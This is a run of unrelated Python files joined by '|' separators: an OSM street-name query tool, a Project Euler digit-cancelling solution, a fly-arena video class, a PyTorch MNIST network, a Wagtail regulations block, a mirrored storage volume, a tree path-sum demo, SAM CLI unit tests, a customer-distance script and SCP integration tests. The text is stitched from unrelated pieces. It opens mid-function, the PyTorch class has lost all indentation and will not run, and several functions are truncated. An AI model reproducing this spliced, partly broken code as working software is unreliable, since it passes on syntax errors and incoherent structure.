                # BUG FIX: the format string has two placeholders but was
                # passed a single argument, raising IndexError at run time.
                # get_status() presumably yields a (status, reason) pair --
                # TODO confirm against UpdateManager.get_status().
                print("status: {0} ({1})".format(*update.get_status()))
    except Exception:
        logging.exception("Unexpected error during command execution")
        return 1
    return 0
|
from OSMPythonTools.overpass import Overpass, overpassQueryBuilder
from OSMPythonTools.nominatim import Nominatim
import argparse
import pprint
import sys
# OSM "highway=" tag values, grouped from major roads to footpaths; the
# granularity argument of searchStreets() selects how many groups to use.
highway_roads = ['motorway', 'trunk', 'primary', 'secondary', 'tertiary', 'unclassified', 'residential']
highway_link_roads = ['motorway_link', 'trunk_link', 'primary_link', 'secondary_link', 'tertiary_link']
highway_special = ['living_street', 'service', 'pedestrian', 'track', 'bus_guideway', 'escape', 'raceway', 'road', 'busway']
highway_paths = ['footway', 'bridleway', 'steps', 'corridor', 'path']
# Module-level flag set from -v in the __main__ block below.
verbose_output = False
def searchStreets(searchArea, granularity):
    """Return the set of unique street names inside *searchArea*.

    :param searchArea: Nominatim query result delimiting the search.
    :param granularity: 1 (major roads only) .. 8 (every named way that
        carries any highway tag).
    """
    if verbose_output:
        print(f"Searching for streets in {searchArea.displayName()} with granularity {granularity}")
    highway_selectors = []
    # BUG FIX: load_all was only assigned in the granularity >= 8 branch,
    # so reading it below raised NameError for every lower granularity.
    load_all = False
    if granularity <= 1:
        highway_selectors += highway_roads[:2]
    elif granularity == 2:
        highway_selectors += highway_roads[:3]
    elif granularity == 3:
        highway_selectors += highway_roads[:3]
        highway_selectors += highway_link_roads[:3]
    elif granularity == 4:
        highway_selectors += highway_roads[:5]
        highway_selectors += highway_link_roads
    elif granularity == 5:
        highway_selectors += highway_roads
        highway_selectors += highway_link_roads
    elif granularity == 6:
        highway_selectors += highway_roads
        highway_selectors += highway_link_roads
        highway_selectors += highway_special
    elif granularity == 7:
        highway_selectors += highway_roads
        highway_selectors += highway_link_roads
        highway_selectors += highway_special
        highway_selectors += highway_paths
    elif granularity >= 8:
        load_all = True
    selector_criteria = ['name']
    if load_all:
        # Any named way with a highway tag, regardless of its value.
        selector_criteria.append('highway')
    else:
        highway_regex = '|'.join(highway_selectors)
        selector_criteria.append(f'"highway"~"{highway_regex}"')
    query = overpassQueryBuilder(area=searchArea, elementType='way', selector=selector_criteria, out='body')
    overpass = Overpass()
    streets = overpass.query(query)
    street_names = set()
    # NOTE(review): reaches into the private _elements attribute of the
    # OSMPythonTools result; the public elements() accessor would be safer.
    for street in streets._elements:
        street_names.add(street.tags()['name'])
    if verbose_output:
        print(f"Found {len(street_names)} unique street names")
    return street_names
def searchForKey(searchArea, key):
    """Return the set of unique names of nodes in *searchArea* that carry
    the OSM tag *key* (e.g. 'shop', 'amenity')."""
    if verbose_output:
        print(f"Searching for {key} in {searchArea.displayName()}")
    # Only nodes that are named AND tagged with the requested key.
    selector_criteria = ['name', key]
    query = overpassQueryBuilder(area=searchArea, elementType='node', selector=selector_criteria, out='body')
    overpass = Overpass()
    result = overpass.query(query)
    entries = set()
    # NOTE(review): uses the private _elements attribute; the public
    # elements() accessor would be safer.
    for result_entry in result._elements:
        entries.add(result_entry.tags()['name'])
    if verbose_output:
        print(f"Found {len(entries)} unique entries")
    return entries
def writeToOutput(output, result):
    """Write every entry of *result* to the *output* stream, one per line."""
    output.writelines("%s\n" % entry for entry in result)
def main(args):
    """Resolve the query location, then write each selected category of
    OSM names (streets, shops, ...) to the output stream, one per line.
    """
    nominatim = Nominatim()
    # NOTE(review): args.query comes from nargs=1 and is therefore a
    # one-element list, not a string -- confirm Nominatim.query accepts it.
    searchArea = nominatim.query(args.query)
    if verbose_output:
        print(searchArea.displayName())
    output = args.o
    result = set()

    def emit(entries):
        # BUG FIX: `result` was never populated, so the verbose summary
        # always reported 0; track everything written here.
        result.update(entries)
        writeToOutput(output, entries)

    if args.c:
        emit(searchStreets(searchArea, 8))
    if args.r:
        # BUG FIX: the parser defines no -s option (args.s raised
        # AttributeError); -r itself carries the granularity value.
        emit(searchStreets(searchArea, args.r))
    if args.a or args.c:
        emit(searchForKey(searchArea, 'shop'))
        emit(searchForKey(searchArea, 'amenity'))
        emit(searchForKey(searchArea, 'leisure'))
        emit(searchForKey(searchArea, 'sport'))
    if args.b or args.c:
        emit(searchForKey(searchArea, 'barrier'))
        emit(searchForKey(searchArea, 'boundary'))
    if args.m or args.c:
        emit(searchForKey(searchArea, 'man_made'))
        emit(searchForKey(searchArea, 'building'))
    if args.i or args.c:
        emit(searchForKey(searchArea, 'craft'))
        emit(searchForKey(searchArea, 'office'))
    if args.e or args.c:
        emit(searchForKey(searchArea, 'emergency'))
        emit(searchForKey(searchArea, 'power'))
        emit(searchForKey(searchArea, 'public_transport'))
        emit(searchForKey(searchArea, 'railway'))
        emit(searchForKey(searchArea, 'telecom'))
    if args.n or args.c:
        emit(searchForKey(searchArea, 'geological'))
        emit(searchForKey(searchArea, 'natural'))
    if args.p or args.c:
        emit(searchForKey(searchArea, 'historic'))
        emit(searchForKey(searchArea, 'place'))
    if args.w or args.c:
        emit(searchForKey(searchArea, 'water'))
        emit(searchForKey(searchArea, 'waterway'))
    if verbose_output:
        print(f'Found a total of {len(result)} unique entries')
if __name__ == "__main__":
    # CLI definition; -c queries every category below in one run.
    parser = argparse.ArgumentParser("Query geo data")
    parser.add_argument('-r', type=int, help='Query roads names and set a granularity between 1-8')
    parser.add_argument('-b', action='store_true', help='Query barriers and boundaries')
    parser.add_argument('-p', action='store_true', help='Query historic and place')
    parser.add_argument('-i', action='store_true', help='Query craft and office')
    parser.add_argument('-e', action='store_true', help='Query infrastructure')
    parser.add_argument('-a', action='store_true', help='Query shops, leisure, sport and amenities')
    parser.add_argument('-m', action='store_true', help='Query man_made and buildings')
    parser.add_argument('-n', action='store_true', help='Query natural and geological')
    parser.add_argument('-w', action='store_true', help='Query water and waterways')
    parser.add_argument('-c', action='store_true', help='Query everything')
    parser.add_argument('-v', action='store_true', help='Verbose output, polutes stdout')
    parser.add_argument('-o', type=argparse.FileType('w', encoding="utf-8"), default=sys.stdout, help='Output file')
    parser.add_argument('query', nargs=1, help='Query to determine the location')
    args = parser.parse_args()
    # Module-level flag read by the search helpers above.
    verbose_output = args.v
    main(args)
|
# coding=utf-8
"""
Project Euler Problem 33
Digit cancelling fractions
Solved by Ahrar Monsur
The fraction 49/98 is a curious fraction, as an inexperienced mathematician in attempting to simplify it may incorrectly believe that 49/98 = 4/8, which is correct, is obtained by cancelling the 9s.
We shall consider fractions like, 30/50 = 3/5, to be trivial examples.
There are exactly four non-trivial examples of this type of fraction, less than one in value, and containing two digits in the numerator and denominator.
If the product of these four fractions is given in its lowest common terms, find the value of the denominator.
"""
from __future__ import division
from functools import reduce
def get_common_digits(numerator, denominator):
    """Return the set of digit characters shared by numerator and denominator."""
    return set(str(numerator)) & set(str(denominator))
def get_naive_fraction(numerator, denominator):
    """Return the fraction produced by naively "cancelling" each digit the
    numerator and denominator have in common (one occurrence per shared
    digit).  A side that runs out of digits becomes 0.
    """
    num_digits = list(str(numerator))
    den_digits = list(str(denominator))
    for digit in set(num_digits) & set(den_digits):
        num_digits.remove(digit)
        den_digits.remove(digit)
    naive_num = int(''.join(num_digits)) if num_digits else 0
    naive_den = int(''.join(den_digits)) if den_digits else 0
    return naive_num, naive_den
def main():
    """Find all four non-trivial two-digit digit-cancelling fractions and
    print them together with the product of the fractions.

    BUG FIX: the file imports functools.reduce and __future__ division
    (Python 3 intent) but used `xrange`, Python 2 `print` statements, and
    indexed the iterator returned by zip() -- all of which crash on
    Python 3.  Rewritten to run on both interpreters with identical output.
    """
    candidates = []
    for den in range(10, 100):
        for num in range(10, den):
            common_digits = get_common_digits(num, den)
            # A shared digit other than a trivial trailing zero is needed.
            if common_digits not in [set('0'), set()]:
                naive_num, naive_den = get_naive_fraction(num, den)
                if (naive_num
                        and naive_den
                        and num / den == naive_num / naive_den):
                    candidates.append((num, den))
    # gather all candidate numerators and denominators
    candidate_groups = list(zip(*candidates))
    num_prod = reduce(lambda x, y: x * y, candidate_groups[0])
    den_prod = reduce(lambda x, y: x * y, candidate_groups[1])
    print("Candidates: {}".format(candidates))
    print("Product of candidates: {}/{}".format(num_prod, den_prod))


main()
|
import numpy as np
from skimage.color import gray2rgb
from skimage.draw import (
circle,
circle_perimeter,
circle_perimeter_aa
)
from skimage.morphology import (
dilation,
disk
)
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class Arena(QObject):
    """Base class for arena objects.

    Contains a simple function to generate a background image for a video.

    Parameters
    ----------
    video : motmot.FlyMovieFormat.FlyMovie object
        Video to calculate a background image from.

    Attributes
    ----------
    height : int
        Video height in pixels.
    width : int
        Video width in pixels.
    n_frames : int
        Total number of frames contained within video.
    background_image : None or np.ndarray of shape [height, width] (default = None)
        Background image calculated as mean of a specified number of frames
        taken from the video.
    arena_size : int
        Size of arena in mm.
    pixels_to_mm : int
        Number of pixels in 1 mm of arena.

    Signals
    -------
    background_frame_ix : int
        Contains processing information to keep track of which frame is being
        added to the background image.
    """
    background_frame_ix = pyqtSignal(int)

    def __init__(self, video, parent=None):
        super(Arena, self).__init__(parent)
        self.video = video
        self.height = video.get_height()
        self.width = video.get_width()
        self.n_frames = video.get_n_frames()
        self.arena_size = None
        self.pixels_to_mm = None
        self.background_image = None

    def calculate_background(self, n_background_images=200):
        """Calculates a background image for a video.

        Parameters
        ----------
        n_background_images : int (default = 200)
            Number of images to use for calculating the background.
        """
        # BUG FIX: np.float was a deprecated alias of the builtin float and
        # was removed in NumPy 1.24; use float directly (same dtype).
        background_image = np.zeros(
            shape=(self.height, self.width), dtype=float)
        if n_background_images > self.n_frames:
            raise AttributeError("number of images to use for background " +
                "calculation should be less than the total number of images " +
                "present in the video associated with this arena.")
        frame_ix = np.random.randint(0, self.n_frames, n_background_images)
        for i, ix in enumerate(frame_ix):
            # BUG FIX: long() does not exist on Python 3 (NameError); int is
            # unbounded there, so int() also avoids the overflow the original
            # cast worked around.
            ix = int(ix)
            current_img = self.video.get_frame(ix)[0]
            background_image = background_image + current_img
            self.background_frame_ix.emit(i)
        background_image = background_image / frame_ix.size
        self.background_image = background_image.astype(np.uint8)
class CircularArena(Arena):
    """Circular Arena object.

    Attributes
    ----------
    center : tuple of length 2
        Center of circle that encloses arena as (rr, cc).
    radius : int
        Radius of circle that encloses arena.
    """
    def __init__(self, video, parent=None):
        super(CircularArena, self).__init__(video, parent)
        self.center = None
        self.radius = None

    def get_arena_mask(self):
        """Return a binary mask (1 inside the arena, 0 outside)."""
        coords = self.get_arena_coordinates()
        mask = np.zeros_like(self.background_image)
        mask[coords] = 1
        return mask

    def get_arena_coordinates(self):
        """Returns image coordinates contained within CircularArena.

        Returns
        -------
        rr : np.ndarray | shape = [N]
            Rows containing circle coordinates.
        cc : np.ndarray | shape = [N]
            Columns containing circle coordinates.
        """
        # NOTE(review): skimage.draw.circle was deprecated and then removed
        # in scikit-image >= 0.19 (replaced by skimage.draw.disk) -- confirm
        # the pinned scikit-image version still provides it.
        return circle(self.center[0], self.center[1], self.radius,
                      shape=self.background_image.shape)

    def settings_valid(self):
        """Checks to see that all necessary settings have been set."""
        if self.center is not None and \
                self.radius is not None and \
                self.background_image is not None and \
                self.arena_size is not None and \
                self.pixels_to_mm is not None:
            return True
        return False

    def draw_arena(self, color=(255, 0, 0), thickness=2):
        """Draws perimeter of circular arena.

        Parameters
        ----------
        color : tuple of length 3 (default = (255, 0, 0))
            Color of outline of arena (R, G, B).
        thickness : int
            How thick should the line used to define the edge of the
            arena be?

        Returns
        -------
        arena_image : np.ndarray | shape = [height, width, 3]
            Three-dimensional (color) image of arena.
        """
        # make a copy of the background image so that the actual
        # background image is not affected.
        arena_image = self.background_image.copy()
        # using skimage
        # =============
        arena_image = gray2rgb(arena_image)
        assert arena_image.dtype == np.uint8, "image not of type uint8"
        # get the coordinates defining the perimeter of this arena.
        rr, cc = circle_perimeter(
            self.center[0],
            self.center[1],
            self.radius,
            shape=self.background_image.shape
        )
        # expand the line width of the above circle coordinates.
        perimeter_mask = np.zeros_like(self.background_image)
        perimeter_mask[rr, cc] = 1
        dilated_perimeter_mask = dilation(
            perimeter_mask,
            disk(thickness)
        )
        rr, cc = np.where(dilated_perimeter_mask)
        # paint the (dilated) perimeter in the requested color.
        arena_image[rr, cc, :] = color
        return arena_image
|
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def predict(model, device, test_loader):
    """Run the model over test_loader and compute argmax predictions.

    NOTE(review): `correct` is initialized but never updated and nothing is
    returned -- this looks like a truncated copy of the usual evaluation
    loop (accuracy accumulation and a return statement appear missing).
    """
    model.eval()  # disable dropout for inference
    correct = 0
    with torch.no_grad():  # no autograd bookkeeping needed
        for data, target in test_loader:
            data, target = data.to(device), target.to(device)
            output = model(data)
            # class index with the highest log-probability, per sample
            pred = output.argmax(dim=1, keepdim=True)
|
from datetime import date
from django.db.models import Prefetch
from wagtail.core import blocks
from regulations3k.models.django import EffectiveVersion
from v1.atomic_elements import organisms
class RegulationsList(organisms.ModelBlock):
    """StreamField block rendering a listing of live regulation pages.

    Each listed regulation gets its future (not-yet-effective, non-draft)
    versions prefetched onto a `future_versions` attribute for templates.
    """
    model = "regulations3k.RegulationPage"
    ordering = "title"

    heading = blocks.CharBlock(
        required=False, help_text="Regulations list heading"
    )
    more_regs_page = blocks.PageChooserBlock(
        help_text="Link to more regulations"
    )
    more_regs_text = blocks.CharBlock(
        required=False, help_text="Text to show on link to more regulations"
    )

    def filter_queryset(self, qs, value):
        # Only published (live) regulation pages are listed.
        return qs.live()

    def get_queryset(self, value):
        """Return live pages with future effective versions prefetched."""
        qs = super().get_queryset(value)
        future_versions_qs = EffectiveVersion.objects.filter(
            draft=False, effective_date__gte=date.today()
        )
        # Avoid N+1 queries: attach future versions in a single prefetch.
        qs = qs.prefetch_related(
            Prefetch(
                "regulation__versions",
                queryset=future_versions_qs,
                to_attr="future_versions",
            )
        )
        return qs

    def get_context(self, value, parent_context=None):
        # Expose the queryset to the template as "regulations".
        context = super().get_context(value, parent_context=parent_context)
        context["regulations"] = self.get_queryset(value)
        return context

    class Meta:
        icon = "list-ul"
        template = "regulations3k/regulations-listing.html"
class RegulationsListingFullWidthText(organisms.FullWidthText):
    # Full-width text organism extended with the regulations listing block.
    regulations_list = RegulationsList()
|
#
# Copyright(c) 2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
from threading import Lock
from .volume import Volume, VOLUME_POISON
from .io import Io, IoDir
from ctypes import cast, c_void_p, CFUNCTYPE, c_int, POINTER, memmove, sizeof, pointer
class ReplicatedVolume(Volume):
    """Mirror (RAID-1 style) volume: writes, flushes and discards go to both
    the primary and secondary backing volumes; reads are served from the
    primary only.
    """
    def __init__(self, primary: Volume, secondary: Volume, uuid=None):
        super().__init__(uuid)
        self.primary = primary
        self.secondary = secondary
        # The secondary must be able to absorb everything the primary can.
        if secondary.get_max_io_size() < primary.get_max_io_size():
            raise Exception("secondary volume max io size too small")
        if secondary.get_length() < primary.get_length():
            raise Exception("secondary volume size too small")

    def do_open(self):
        """Open both backing volumes; on secondary failure close the
        primary again so no handle is leaked."""
        ret = self.primary.do_open()
        if ret:
            return ret
        ret = self.secondary.do_open()
        if ret:
            self.primary.close()
            return ret

    def close(self):
        self.primary.close()
        self.secondary.close()

    def get_length(self):
        # Capacity is that of the primary (secondary is checked to be >=).
        return self.primary.get_length()

    def get_max_io_size(self):
        return self.primary.get_max_io_size()

    def _prepare_io(self, io):
        """Splice a joint completion into *io*.

        The replacement callback fires once per submission (primary and
        secondary); when both have completed it restores the original C
        completion and invokes it with the first error seen (0 if none).
        """
        # Snapshot the original C completion callback so it can be restored.
        original_cb = Io.END()
        pointer(original_cb)[0] = io.contents._end
        lock = Lock()
        error = 0
        io_remaining = 2

        @CFUNCTYPE(None, c_void_p, c_int)
        def cb(io, err):
            nonlocal io_remaining
            nonlocal error
            nonlocal original_cb
            nonlocal lock
            io = cast(io, POINTER(Io))
            # The two backing volumes may complete concurrently; the lock
            # protects the error latch and the remaining-count decrement.
            with lock:
                if err:
                    error = err
                io_remaining -= 1
                finished = True if io_remaining == 0 else False
            if finished:
                # Both submissions done: restore and fire the original
                # completion exactly once.
                io.contents._end = original_cb
                original_cb(io, error)

        io.contents._end = cb

    def do_submit_io(self, io):
        if io.contents._dir == IoDir.WRITE:
            # Mirror writes to both volumes under the joint completion.
            self._prepare_io(io)
            self.primary.submit_io(io)
            self.secondary.submit_io(io)
        else:
            # for read just pass through down to primary
            # with original completion
            self.primary.submit_io(io)

    def do_submit_flush(self, flush):
        self._prepare_io(flush)
        self.primary.submit_flush(flush)
        self.secondary.submit_flush(flush)

    def do_submit_discard(self, discard):
        self._prepare_io(discard)
        self.primary.submit_discard(discard)
        self.secondary.submit_discard(discard)

    def dump(self, offset=0, size=0, ignore=VOLUME_POISON, **kwargs):
        # Both volumes hold identical data, so dumping the primary suffices.
        self.primary.dump()

    def md5(self):
        return self.primary.md5()
|
# For balanced binary tree, will be O(n*log(n)) because
# max path depth is O(log(n)) due to height of tree.
class TreeNode:
    """Binary-tree node able to enumerate root-to-descendant paths whose
    node values sum to a target.
    """

    def __init__(self, val, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

    def dfs(self, goal, all_paths, curr_path=None):
        """Depth-first search from this node; every path (starting here)
        whose values sum to *goal* is appended to *all_paths*, which is
        also returned.
        """
        if curr_path is None:
            curr_path = []
        curr_path.append(self.val)
        remaining = goal - self.val
        if remaining == 0:
            # Snapshot: curr_path keeps mutating as the search continues.
            all_paths.append(list(curr_path))
        for child in (self.left, self.right):
            if child is not None:
                child.dfs(goal=remaining, all_paths=all_paths,
                          curr_path=curr_path)
        # Backtrack: drop this node before returning to the parent.
        curr_path.pop()
        return all_paths
def find_paths(root, total):
    """Return all root-to-descendant paths in *root*'s tree summing to *total*."""
    paths = []
    root.dfs(goal=total, all_paths=paths)
    return paths
def main():
    """Demo: build a small tree and print the paths summing to 23."""
    root = TreeNode(12)
    root.left = TreeNode(7)
    root.right = TreeNode(1)
    root.left.left = TreeNode(4)
    root.right.left = TreeNode(10)
    root.right.right = TreeNode(5)
    # Renamed from `sum`, which shadowed the builtin of the same name.
    target_sum = 23
    print("Tree paths with sum " + str(target_sum) +
          ": " + str(find_paths(root, target_sum)))
main()
|
"""
Unit test for Utils
"""
import os
from unittest import TestCase
from unittest.mock import patch, Mock
from samcli.local.docker.utils import to_posix_path, find_free_port
from samcli.local.docker.exceptions import NoFreePortsError
class TestPosixPath(TestCase):
    """Tests for samcli.local.docker.utils.to_posix_path."""

    def setUp(self):
        # The same location as a Windows path and its Docker-style POSIX
        # equivalent.
        self.ntpath = "C:\\Users\\UserName\\AppData\\Local\\Temp\\temp1337"
        self.posixpath = "/c/Users/UserName/AppData/Local/Temp/temp1337"
        self.current_working_dir = os.getcwd()

    @patch("samcli.local.docker.utils.os")
    def test_convert_posix_path_if_windows_style_path(self, mock_os):
        # On Windows ("nt") the path must be rewritten to POSIX form.
        mock_os.name = "nt"
        self.assertEqual(self.posixpath, to_posix_path(self.ntpath))

    @patch("samcli.local.docker.utils.os")
    def test_do_not_convert_posix_path(self, mock_os):
        # On POSIX systems the path is returned unchanged.
        mock_os.name = "posix"
        self.assertEqual(self.current_working_dir, to_posix_path(self.current_working_dir))
class TestFreePorts(TestCase):
    """Exercise ``find_free_port`` against mocked socket/random modules."""

    @patch("samcli.local.docker.utils.socket")
    @patch("samcli.local.docker.utils.random")
    def test_free_port_first_attempt(self, patched_random, patched_socket):
        # Every draw yields the same candidate and binding succeeds first try.
        patched_random.randrange = Mock(side_effect=[3093] * 1000)
        self.assertEqual(find_free_port(start=3000, end=4000), 3093)

    @patch("samcli.local.docker.utils.socket")
    @patch("samcli.local.docker.utils.random")
    def test_free_port_after_failed_attempts(self, patched_random, patched_socket):
        # First two bind attempts fail, so the third candidate is returned.
        fake_socket = Mock()
        fake_socket.bind = Mock(side_effect=[OSError, OSError, Mock()])
        patched_socket.socket = Mock(return_value=fake_socket)
        patched_random.randrange = Mock(side_effect=[3093, 3987, 3300, 3033] * 250)
        self.assertEqual(find_free_port(start=3000, end=4000), 3300)

    @patch("samcli.local.docker.utils.socket")
    @patch("samcli.local.docker.utils.random")
    def test_no_free_port_after_failed_attempts(self, patched_random, patched_socket):
        # Binding never succeeds, so the search must give up with an error.
        fake_socket = Mock()
        fake_socket.bind = Mock(side_effect=[OSError, OSError, OSError])
        patched_socket.socket = Mock(return_value=fake_socket)
        patched_random.randrange = Mock(side_effect=[1, 2, 3] * 3)
        with self.assertRaises(NoFreePortsError):
            find_free_port(start=1, end=4)
|
import math
import json
import argparse
import sys
class Customer:
    """A customer record parsed from one JSON line of the data file."""

    def __init__(self, user_id, name, latitude, longitude):
        # Coerce eagerly so malformed records fail at construction time
        # (the caller converts the resulting ValueError into a user error).
        self.user_id = int(user_id)
        self.name = name
        self.latitude = float(latitude)
        self.longitude = float(longitude)

    def __repr__(self):
        return '{} {}: {}'.format(
            type(self).__name__, self.user_id, self.name
        )

    def __cmp__(self, other):
        # NOTE(review): Python 2 only -- int has no __cmp__ on Python 3 and
        # __cmp__ itself is ignored there; also returns None implicitly when
        # *other* lacks a user_id. Confirm the intended ordering contract.
        if hasattr(other, 'user_id'):
            return self.user_id.__cmp__(other.user_id)
class Parser:
    """Reads newline-delimited JSON customer records from a file."""

    @staticmethod
    def parse(filename):
        """Open and parse *filename*; return a list of Customers.

        Each line must be a JSON object with user_id, name, latitude and
        longitude keys. Raises IOError if the file is missing and
        ValueError on malformed JSON or non-numeric coordinates.
        """
        with open(filename) as customer_data:
            records = (json.loads(line) for line in customer_data)
            return [
                Customer(rec['user_id'], rec['name'],
                         rec['latitude'], rec['longitude'])
                for rec in records
            ]
class DistanceCalculator:
    """Great-circle distance from the fixed base location."""

    @staticmethod
    def kmFromBase(customer_latitude, customer_longitude):
        """Return the haversine distance in km from the base coordinates.

        Negative latitudes are south, negative longitudes west.
        """
        base_latitude = 53.3381985
        base_longitude = -6.2592576
        earth_radius_km = 6371
        phi_base = math.radians(base_latitude)
        phi_customer = math.radians(customer_latitude)
        d_phi = math.radians(customer_latitude - base_latitude)
        d_lambda = math.radians(customer_longitude - base_longitude)
        # Haversine term 'a': squared half-chord length between the points.
        a = (
            math.sin(d_phi / 2) * math.sin(d_phi / 2) +
            math.cos(phi_base) * math.cos(phi_customer) *
            math.sin(d_lambda / 2) * math.sin(d_lambda / 2)
        )
        # Central angle via atan2 is numerically stable for antipodes.
        central_angle = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
        return earth_radius_km * central_angle
def main():
    """Parse a customer data file and print the customers within 100 km.

    Exits with status 1 when the file is missing, malformed, or empty.
    """
    #
    # parse arguments
    arg_parser = argparse.ArgumentParser(description='Print a list of customers within 100km from a supplied data file')
    arg_parser.add_argument(
        'datafile',
        type=str,
        help='a file comprising of customer data, one json-formatted customer string per line'
    )
    arguments = arg_parser.parse_args()

    def bad_exit(message, error_code):
        # Print-and-exit helper. print() is called as a function so this
        # also parses on Python 3 (the original Python 2 print statement
        # is a SyntaxError there); the call form works on both versions.
        print(message)
        sys.exit(error_code)
    #
    # parse customer data file
    try:
        customer_list = Parser.parse(arguments.datafile)
    except IOError:
        bad_exit("File [{}] not found".format(arguments.datafile), 1)
    except ValueError:
        bad_exit("File [{}] contains malformed data".format(arguments.datafile), 1)
    if not customer_list:
        bad_exit("No customer data in file [{}]".format(arguments.datafile), 1)
    #
    # sort customers and calculate distance.  An explicit key is used:
    # Python 3 ignores Customer.__cmp__, and sorting by user_id matches the
    # ordering __cmp__ produced on Python 2.
    for customer in sorted(customer_list, key=lambda c: c.user_id):
        try:
            customer_distance = DistanceCalculator.kmFromBase(
                customer.latitude, customer.longitude
            )
        except TypeError:
            bad_exit(
                "Customer data is wrong type; was expecting int, "
                "got [{}] and [{}]".format(customer.latitude, customer.longitude),
                1
            )
        if customer_distance < 100.0:
            print("{0:>3} - {1:<18}".format(
                customer.user_id, customer.name
            ))
|
#!/usr/bin/python
import unittest
import os
import sys
from swiftclient import client
import paramiko
hostname = "127.0.0.1"
port = 8022
# setup logging
#paramiko.util.log_to_file('test_sftpd.log')
class SftpcloudfsTest(unittest.TestCase):
    """FTP Cloud FS main test.

    Integration tests driving SCP over a paramiko SSH channel against a
    running sftpcloudfs server, verifying results through the Swift API.
    Requires OS_API_USER / OS_API_KEY / OS_AUTH_URL in the environment
    (OS_API_TENANT is optional and switches authentication to v2).
    """

    def setUp(self):
        # Fail fast when the required credentials are not configured.
        if not all(['OS_API_KEY' in os.environ,
                    'OS_API_USER' in os.environ,
                    'OS_AUTH_URL' in os.environ,
                    ]):
            # print() call form instead of the Python 2 print statement so
            # the module also parses under Python 3.
            print("env OS_API_USER/OS_API_KEY/OS_AUTH_URL not found.")
            sys.exit(1)
        self.username = os.environ['OS_API_USER']
        self.api_key = os.environ['OS_API_KEY']
        self.tenant = os.environ.get('OS_API_TENANT')
        self.auth_url = os.environ['OS_AUTH_URL']
        self.container = "sftpcloudfs_testing"
        connection_parameters = {
            "user": self.username,
            "key": self.api_key,
            "authurl": self.auth_url,
        }
        if self.tenant:
            connection_parameters['auth_version'] = 2
            connection_parameters['tenant_name'] = self.tenant
        self.conn = client.Connection(**connection_parameters)
        self.conn.put_container(self.container)
        self.transport = paramiko.Transport((hostname, port))
        self.transport.connect(
            username=self.username,
            password=self.api_key,
            # hostkey=hostkey
        )
        self.channel = self.transport.open_session()
        # (a duplicate re-assignment of self.container was removed here)

    def test_setup_and_teardown(self):
        # Verifies that setUp/tearDown alone complete without error.
        pass

    def test_file_upload(self):
        # Single-file upload ("scp -t").  Protocol reference:
        # https://blogs.oracle.com/janp/entry/how_the_scp_protocol_works
        # Example 1.  Every message must be acknowledged with a NUL byte.
        self.channel.exec_command('scp -t /%s/foo' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 6 foo\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        # Confirm the object landed in Swift with the uploaded content.
        headers, content = self.conn.get_object(self.container, 'foo')
        self.assertEqual(content, 'Hello\n')

    def test_file_upload_to_dir(self):
        # Upload a file into a target directory ("scp -td").
        self.channel.exec_command('scp -td /%s' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 6 test\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        headers, content = self.conn.get_object(self.container, 'test')
        self.assertEqual(content, 'Hello\n')

    def test_dir_upload(self):
        # Recursive upload ("scp -tr"): D opens a directory, E closes it.
        # Protocol reference:
        # https://blogs.oracle.com/janp/entry/how_the_scp_protocol_works
        # Example 1
        self.channel.exec_command('scp -tr /%s/foodir' % self.container)
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("D0644 0 foodir\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("C0644 6 test\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("Hello\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        self.channel.sendall("E\n")
        ack = self.channel.recv(1)
        self.assertEqual(ack, "\000")
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')
        headers, content = self.conn.get_object(self.container, 'foodir/test')
        self.assertEqual(content, 'Hello\n')

    # NOTE(review): download_file/download_dir lack the test_ prefix, so
    # unittest never collects them; confirm whether they are intentionally
    # disabled before renaming (they may fail against current servers).
    def download_file(self):
        # Download path ("scp -f"): client sends NUL acks, server streams.
        self.conn.put_object(self.container, 'bar', 'Hello\n')
        self.channel.exec_command('scp -f /%s/bar' % self.container)
        self.channel.send('\000' * 3)
        response = self.channel.read()
        self.assertEqual(response, 'C0644 6 bar\nHello\n')
        exit_status = self.channel.recv_exit_status()
        self.assertEqual(exit_status, 0)
        tail = self.channel.recv(1)
        self.assertEqual(tail, '')

    def download_dir(self):
        # Recursive download ("scp -fr") of a one-file directory.
        self.conn.put_object(self.container, 'foo/bar', 'Hello\n')
        self.channel.exec_command('scp -fr /%s/foo' % self.container)
        self.channel.send('\000' * 5)
        response = self.channel.read()
        self.assertEqual(
            response,
            'D0644 0 foo\n'
            'C0644 6 bar\nHello\n'
            'E\n'
        )
        exit_status = self.channel.recv_exit_status()
